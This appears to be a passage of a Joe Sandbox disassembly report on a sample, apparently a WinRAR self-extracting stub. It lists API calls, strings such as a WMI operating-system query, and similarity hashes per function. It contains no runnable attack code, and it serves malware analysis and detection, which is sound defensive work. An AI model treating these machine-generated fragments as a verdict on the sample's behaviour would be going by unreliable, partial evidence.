• GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 009B61E1
• GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 009B61EF
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,009B6185), ref: 009B6212
• DeleteCriticalSection.KERNEL32(009E60E0,00000007,?,?,009B6185), ref: 009B6235
• CloseHandle.KERNEL32(00000000,?,?,009B6185), ref: 009B6245
Strings
• api-ms-win-core-synch-l1-2-0.dll, xrefs: 009B61B9
• SleepConditionVariableCS, xrefs: 009B61DB
• WakeAllConditionVariable, xrefs: 009B61E7
• kernel32.dll, xrefs: 009B61CA
Similarity
• API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
• String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
• API String ID: 2565136772-3242537097
• Opcode ID: 470e8c0f12ba3bf62f24282792997e86e88815fd164dcafebd3dcbcde84d3f88
• Instruction ID: 6c6a248703970b48c0834e63b3aedc1b0b8946582e1018c625eb1c765fd1537b
• Opcode Fuzzy Hash: 470e8c0f12ba3bf62f24282792997e86e88815fd164dcafebd3dcbcde84d3f88
• Instruction Fuzzy Hash: 2E014CB0EA8321EBDF219B776D0DF963E5CFB94B927004414F81AD2250DA64EC009A31
APIs
• ___free_lconv_mon.LIBCMT ref: 009C3816
  • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C33CE
  • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C33E0
  • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C33F2
  • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C3404
  • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C3416
  • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C3428
  • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C343A
  • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C344C
  • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C345E
  • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C3470
  • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C3482
  • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C3494
  • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C34A6
• _free.LIBCMT ref: 009C380B
  • Part of subcall function 009C03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,009C3546,?,00000000,?,00000000,?,009C356D,?,00000007,?,?,009C396A,?), ref: 009C03EA
  • Part of subcall function 009C03D4: GetLastError.KERNEL32(?,?,009C3546,?,00000000,?,00000000,?,009C356D,?,00000007,?,?,009C396A,?,?), ref: 009C03FC
• _free.LIBCMT ref: 009C382D
• _free.LIBCMT ref: 009C3842
• _free.LIBCMT ref: 009C384D
• _free.LIBCMT ref: 009C386F
• _free.LIBCMT ref: 009C3882
• _free.LIBCMT ref: 009C3890
• _free.LIBCMT ref: 009C389B
• _free.LIBCMT ref: 009C38D3
• _free.LIBCMT ref: 009C38DA
• _free.LIBCMT ref: 009C38F7
• _free.LIBCMT ref: 009C390F
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: 81533b92850e3a549303970e143cc4b29ea6a2c95b782922e3b4ef916bf143d3
• Instruction ID: 5fc17042e0b3cc23e8e648bb22d06e7277fcb24c59abd463245ce2108e981445
• Opcode Fuzzy Hash: 81533b92850e3a549303970e143cc4b29ea6a2c95b782922e3b4ef916bf143d3
• Instruction Fuzzy Hash: 03313931E04344DFEB21AA79E845F5AB3E9EF80310F14C42DF458E7551DAB1AA44CB22
APIs
• __EH_prolog3_GS.LIBCMT ref: 009AD919
  • Part of subcall function 009914A7: _wcslen.LIBCMT ref: 009914B8
• _wcslen.LIBCMT ref: 009AD97B
• _wcslen.LIBCMT ref: 009AD99A
• _wcslen.LIBCMT ref: 009AD9B6
• _strlen.LIBCMT ref: 009ADA14
• GlobalAlloc.KERNEL32(00000040,?,00000000,009CD9F0,00000000,?,00000000,?,<html>,00000006,<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>,?), ref: 009ADA2D
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 009ADA54
Similarity
• API ID: _wcslen$Global$AllocCreateH_prolog3_Stream_strlen
• String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
• API String ID: 1185167184-1533471033
• Opcode ID: 813048a5bc28a55a5df251349f9a70a6d6de13c23710fb751f8ddce643149e5f
• Instruction ID: cf1c1c2d72a45ab07ede19450a457e5f0f9d758dbd0c4f63bb80c9ffd3e06021
• Opcode Fuzzy Hash: 813048a5bc28a55a5df251349f9a70a6d6de13c23710fb751f8ddce643149e5f
• Instruction Fuzzy Hash: CF514F71D02219AFEF04EBA4CC86FEEBBB9EF96310F140019E505AB181DB705E45CBA5
APIs
• GetWindow.USER32(?,00000005), ref: 009B37C4
• GetClassNameW.USER32(00000000,?,00000080), ref: 009B37F0
  • Part of subcall function 009A8DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,009A0E3F,?,?,?,00000046,009A1ECE,00000046,?,exe,00000046), ref: 009A8DBA
• GetWindowLongW.USER32(00000000,000000F0), ref: 009B380C
• SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 009B3823
• GetObjectW.GDI32(00000000,00000018,?), ref: 009B3837
• SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 009B3860
• DeleteObject.GDI32(00000000), ref: 009B3867
• GetWindow.USER32(00000000,00000002), ref: 009B3870
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                              • String ID: STATIC
                                                              • API String ID: 3820355801-1882779555
                                                              • Opcode ID: 8b64c0761a8f283b1f41f0b5e2c5f63ee616d42eff335140aaf481870ac05e36
                                                              • Instruction ID: d466b9278b8da0620a9c8cbcc032a8a6448b3453dfdb9ad402cddc33e6123f1e
                                                              • Opcode Fuzzy Hash: 8b64c0761a8f283b1f41f0b5e2c5f63ee616d42eff335140aaf481870ac05e36
                                                              • Instruction Fuzzy Hash: 1721077255C7507BE220EB649C8AFEFB69CAF85720F004525FA01AA1D1DB309D0556E7
                                                              APIs
                                                              • _free.LIBCMT ref: 009BFF25
                                                                • Part of subcall function 009C03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,009C3546,?,00000000,?,00000000,?,009C356D,?,00000007,?,?,009C396A,?), ref: 009C03EA
                                                                • Part of subcall function 009C03D4: GetLastError.KERNEL32(?,?,009C3546,?,00000000,?,00000000,?,009C356D,?,00000007,?,?,009C396A,?,?), ref: 009C03FC
                                                              • _free.LIBCMT ref: 009BFF31
                                                              • _free.LIBCMT ref: 009BFF3C
                                                              • _free.LIBCMT ref: 009BFF47
                                                              • _free.LIBCMT ref: 009BFF52
                                                              • _free.LIBCMT ref: 009BFF5D
                                                              • _free.LIBCMT ref: 009BFF68
                                                              • _free.LIBCMT ref: 009BFF73
                                                              • _free.LIBCMT ref: 009BFF7E
                                                              • _free.LIBCMT ref: 009BFF8C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 07b8180ca6ef3564ca4dfb079e6b725fed88d5d6bc15846fb80d8ec07ba757c4
                                                              • Instruction ID: 67fe88378b145b4fedcdf113f60b22c5f40ba869de5776156fea57055a02e57b
                                                              • Opcode Fuzzy Hash: 07b8180ca6ef3564ca4dfb079e6b725fed88d5d6bc15846fb80d8ec07ba757c4
                                                              • Instruction Fuzzy Hash: 0B11777591428CFFDF01FF94C942EDD3BA5EF84350F5140A9BA085B162D671DA50DB41
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 322700389-393685449
                                                              • Opcode ID: 322eb30f076470d9208f8990fb42e5186462fbf2e13121dd86e44d520f78ea20
                                                              • Instruction ID: 420f35bf7fa2daea9e22bb14496a1df3a4093c6a6c6d4a6ea450febdafbe9354
                                                              • Opcode Fuzzy Hash: 322eb30f076470d9208f8990fb42e5186462fbf2e13121dd86e44d520f78ea20
                                                              • Instruction Fuzzy Hash: 2BB19C35820219EFCF14DFA5DA81AEEBBB9FF84320F14445AFA056B252D730DA51CB91
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 0099D99A
                                                              • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 0099D9BF
                                                              • GetLongPathNameW.KERNEL32(?,?,?), ref: 0099DA11
                                                              • GetShortPathNameW.KERNEL32(?,00000000,00000000), ref: 0099DA34
                                                              • GetShortPathNameW.KERNEL32(?,?,?), ref: 0099DA84
                                                              • MoveFileW.KERNEL32(-00000040,-00000028), ref: 0099DC9F
                                                              • MoveFileW.KERNEL32(-00000028,-00000040), ref: 0099DCEC
                                                                • Part of subcall function 009914A7: _wcslen.LIBCMT ref: 009914B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: NamePath$FileLongMoveShort$H_prolog3__wcslen
                                                              • String ID: rtmp
                                                              • API String ID: 2388273531-870060881
                                                              • Opcode ID: 67d9a225ce3040e3d108c2a273955006141efa84a916612634c33545f7d21c0a
                                                              • Instruction ID: 61f942346cb74e069780dc994026936e13a9ff4b002163843504766b434cf14c
                                                              • Opcode Fuzzy Hash: 67d9a225ce3040e3d108c2a273955006141efa84a916612634c33545f7d21c0a
                                                              • Instruction Fuzzy Hash: B5B10470902259DACF20DFA8CC85BDDBBB9BF99305F444099E449A7291DB349F89CF60
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3__wcslen
                                                              • String ID: .rar$exe$rar$sfx
                                                              • API String ID: 3251556500-630704357
                                                              • Opcode ID: 156e991f3e01ff7c2518499c6ca1d434a86978fdcc873c228509452479c6a3c6
                                                              • Instruction ID: 7e3a74b6380a0e93376c80c96d03378a47539b37605b65490ab08325741dd139
                                                              • Opcode Fuzzy Hash: 156e991f3e01ff7c2518499c6ca1d434a86978fdcc873c228509452479c6a3c6
                                                              • Instruction Fuzzy Hash: 2671A270A007559FCB21DF68C981BADB7F8EF8AB10F24091DF4859B291DB719942CBD1
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,009A04AB,009A04AD,00000000,00000000,1AC349C0,00000001,00000000,00000000,?,009A038C,?,00000004,009A04AB,ROOT\CIMV2), ref: 009B5459
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,009A04AB,?,00000000,00000000,?,?,009A038C,?,00000004,009A04AB), ref: 009B54D4
                                                              • SysAllocString.OLEAUT32(00000000), ref: 009B54DF
                                                              • _com_issue_error.COMSUPP ref: 009B5508
                                                              • _com_issue_error.COMSUPP ref: 009B5512
                                                              • GetLastError.KERNEL32(80070057,1AC349C0,00000001,00000000,00000000,?,009A038C,?,00000004,009A04AB,ROOT\CIMV2), ref: 009B5517
                                                              • _com_issue_error.COMSUPP ref: 009B552A
                                                              • GetLastError.KERNEL32(00000000,?,009A038C,?,00000004,009A04AB,ROOT\CIMV2), ref: 009B5540
                                                              • _com_issue_error.COMSUPP ref: 009B5553
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                              • String ID:
                                                              • API String ID: 1353541977-0
                                                              • Opcode ID: 516c224ec1c3491263cebe4139682f5b2f982f96f29213f2f2a660a3a295681b
                                                              • Instruction ID: 7de90756ef1387bcf9951efafa7af7d80d238001f92526a2ae9cd9fa5b374812
                                                              • Opcode Fuzzy Hash: 516c224ec1c3491263cebe4139682f5b2f982f96f29213f2f2a660a3a295681b
                                                              • Instruction Fuzzy Hash: 1F4106B1A00604EBCB10DF68DE45BEEBBE9EB88731F114229F509E7290D775D940CBA4
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 009A0470
                                                                • Part of subcall function 009A0360: __EH_prolog3.LIBCMT ref: 009A0367
                                                              • VariantClear.OLEAUT32(?), ref: 009A05FA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$ClearVariant
                                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                              • API String ID: 4196654922-3505469590
                                                              • Opcode ID: 9f37451feb614b73d9371fe2b6146b6df840effba586759e59be8637b828c8c3
                                                              • Instruction ID: 423aca415dc9e042b767495f81106442e16831bd98b84faaa553d10fae9ca435
                                                              • Opcode Fuzzy Hash: 9f37451feb614b73d9371fe2b6146b6df840effba586759e59be8637b828c8c3
                                                              • Instruction Fuzzy Hash: 90611B71E10219AFDB14DFA4CC95EAEBBB9FF89714B14055CF516A72A0CB30AD01DBA0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_wcslen
                                                              • String ID: $</p>$</style>$<br>$<style>
                                                              • API String ID: 3746244732-3393513139
                                                              • Opcode ID: 15b0306e50039745a6fda10ecc5ad60d826c700779b79a60dd44e42dc70a7804
                                                              • Instruction ID: 2881a643a923fddd9b83179e35a659747128d95cd03610bd664ad27df469066b
                                                              • Opcode Fuzzy Hash: 15b0306e50039745a6fda10ecc5ad60d826c700779b79a60dd44e42dc70a7804
                                                              • Instruction Fuzzy Hash: 09514775B4832397DB309A24886177673A9AFA7755F580019FCC1AB2C0EB758D80C3D1
                                                              APIs
                                                                • Part of subcall function 00991E44: GetDlgItem.USER32(00000000,00003021), ref: 00991E88
                                                                • Part of subcall function 00991E44: SetWindowTextW.USER32(00000000,009CC6C8), ref: 00991E9E
                                                              • EndDialog.USER32(?,00000001), ref: 009B0720
                                                              • SendMessageW.USER32(?,00000080,00000001,000103E5), ref: 009B0747
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,17050D3A), ref: 009B0760
                                                              • GetDlgItem.USER32(?,00000065), ref: 009B077C
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 009B0790
                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 009B07A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Item$DialogTextWindow
                                                              • String ID: LICENSEDLG
                                                              • API String ID: 3077722735-2177901306
                                                              • Opcode ID: 4ddb76cc2b1b2b03f57728b37ea35e22b499904da1f1d981c30b535267731455
                                                              • Instruction ID: 1fee9ea44de199bceacb4df86ecff55afc4e0a0dc2f305453b334492dd2fb5e0
                                                              • Opcode Fuzzy Hash: 4ddb76cc2b1b2b03f57728b37ea35e22b499904da1f1d981c30b535267731455
                                                              • Instruction Fuzzy Hash: B721F73125D244BBD6116F65DECCFABBB6CEB87755F010004F6019A090CB61AD01EB72
                                                              APIs
                                                              • __aulldiv.LIBCMT ref: 009A783D
                                                                • Part of subcall function 009A067E: GetVersionExW.KERNEL32(?), ref: 009A06AF
                                                              • FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 009A7860
                                                              • FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 009A7872
                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 009A7883
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 009A7893
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 009A78A3
                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 009A78DE
                                                              • __aullrem.LIBCMT ref: 009A7984
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                              • String ID:
                                                              • API String ID: 1247370737-0
                                                              • Opcode ID: 6619f49316ffc765f61c0dcf0d551b7e8328efb1a0c6872dd0c67cf9aa3bc5cf
                                                              • Instruction ID: 14cfb938faf76bad7d2e1b4fe90047b132f0e69a9c6c411defc4e91f70b0e5b8
                                                              • Opcode Fuzzy Hash: 6619f49316ffc765f61c0dcf0d551b7e8328efb1a0c6872dd0c67cf9aa3bc5cf
                                                              • Instruction Fuzzy Hash: 3F512AB15083059FD710DFA5C88596BFBE9FB88714F40892EF59AC2210E734E549CB92
APIs
• __EH_prolog3_GS.LIBCMT ref: 009A0E50
• GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,00000030), ref: 009A0E85
• GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 009A0EC4
• _wcslen.LIBCMT ref: 009A0ED4
• GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,00000030), ref: 009A0F51
• GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 009A0F93
• _wcslen.LIBCMT ref: 009A0FA3
Memory Dump Source
• Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
• Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
Similarity
• API ID: FullNamePath$_wcslen$H_prolog3_
• String ID:
• API String ID: 840513527-0
• Opcode ID: 916e52fe67703b1dfdcc8b709c1622016a833f286722f2ee1bb7e6a2441cfa69
• Instruction ID: 92b1031fa0f2fa0b90afbdb700fdd5e791092bab7c091f1b7b137445f34eb46c
• Opcode Fuzzy Hash: 916e52fe67703b1dfdcc8b709c1622016a833f286722f2ee1bb7e6a2441cfa69
• Instruction Fuzzy Hash: C0615771D00249ABDF14DFA9D985EEEBBBAAFCA710F14411AF410F7290DB749940CBA1
APIs
• GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,009C69AE,?,00000000,?,00000000,00000000), ref: 009C627B
• __fassign.LIBCMT ref: 009C62F6
• __fassign.LIBCMT ref: 009C6311
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 009C6337
• WriteFile.KERNEL32(?,?,00000000,009C69AE,00000000,?,?,?,?,?,?,?,?,?,009C69AE,?), ref: 009C6356
• WriteFile.KERNEL32(?,?,00000001,009C69AE,00000000,?,?,?,?,?,?,?,?,?,009C69AE,?), ref: 009C638F
Memory Dump Source
• Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
• Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 0c3dcc005dc6405e7a92944912ddd7b2d384019a86a0e085d341029d43fd3732
• Instruction ID: 3aeda99900ffaaa517c4acea5ebb39a417da9a2b66ecdbb359b864715121ecfe
• Opcode Fuzzy Hash: 0c3dcc005dc6405e7a92944912ddd7b2d384019a86a0e085d341029d43fd3732
• Instruction Fuzzy Hash: 88518EB1E102899FDB10CFA8D885FEEBBF8EB49310F14411EE956E7291D770A940CB61
APIs
• _ValidateLocalCookies.LIBCMT ref: 009B93F7
• ___except_validate_context_record.LIBVCRUNTIME ref: 009B93FF
• _ValidateLocalCookies.LIBCMT ref: 009B9488
• __IsNonwritableInCurrentImage.LIBCMT ref: 009B94B3
• _ValidateLocalCookies.LIBCMT ref: 009B9508
Strings
Memory Dump Source
• Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
• Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: d16fb3a42dbc33a105aec5c049e4fc0f7ce122301fb8b0252b26dbdaa43129d7
• Instruction ID: 3510aeafadd8ae3736090c81951470230e8f1ce3051f4f1714ce74bb1b3c3adc
• Opcode Fuzzy Hash: d16fb3a42dbc33a105aec5c049e4fc0f7ce122301fb8b0252b26dbdaa43129d7
• Instruction Fuzzy Hash: 8841C234E10218AFCF10DF68C985ADEBBF6AF85334F148555E9159B3A2C731AE06CB91
APIs
• __EH_prolog3_GS.LIBCMT ref: 009AE26C
• ShowWindow.USER32(?,00000000,00000038), ref: 009AE294
